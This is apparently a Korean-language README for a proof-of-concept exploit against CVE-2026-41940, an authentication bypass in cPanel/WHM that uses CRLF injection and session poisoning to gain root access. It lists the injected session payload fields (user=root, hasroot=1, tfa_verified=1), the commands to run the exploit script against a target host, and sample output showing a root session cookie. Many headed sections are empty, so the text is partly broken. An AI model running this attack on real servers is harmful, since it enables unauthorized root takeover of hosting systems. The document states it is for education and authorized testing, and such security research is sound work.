
CVE-2026-41940에 대한 개념 증명 익스플로잇으로, CRLF 주입 및 세션 포이즈닝을 통해 cPanel/WHM의 인증 우회를 시연하여 루트 수준의 접근 권한을 획득합니다.
이 저장소는 CVE-2026-41940에 대한 개념 증명(PoC) 익스플로잇을 포함하며, CRLF 주입 및 세션 포이즈닝을 통한 cPanel/WHM의 다단계 인증 우회를 시연합니다.
면책 조항: 이 코드는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 사용하지 마십시오.
이 PoC는 Hadrian과 watchTowr이 관찰한 기술을 기반으로 실제 공격 체인을 재현합니다.
이 취약점을 통해 공격자는 다음을 수행할 수 있습니다:
이 익스플로잇은 4단계 프로세스를 따릅니다:
주입된 페이로드에는 다음이 포함됩니다:
user=root
hasroot=1
tfa_verified=1
cp_security_token=/cpsessXXXXXXXXXX
/json-api/version?api.version=1
성공 시:
의존성 설치:
pip install requests
python3 exploit.py --host <target>
선택적 플래그:
--ssl HTTPS 사용
--port 사용자 지정 포트 지정
--verbose 디버그 출력 활성화
python3 exploit.py --host example.com --ssl --port 2087 --verbose
성공적인 익스플로잇:
[+] SUCCESS! Authenticated as root via CVE-2026-41940.
[+] Cookie: whostmgrsession=...
[+] Admin URL: https://target:2087/cpsess.../json-api/version?api.version=1
시스템 관리자라면:
취약점은 다음에 있습니다:
익스플로잇이 악용하는 것:
이 PoC는 다음 목적으로 있는 그대로 제공됩니다:
무단 사용은 법률 및 규정을 위반할 수 있습니다.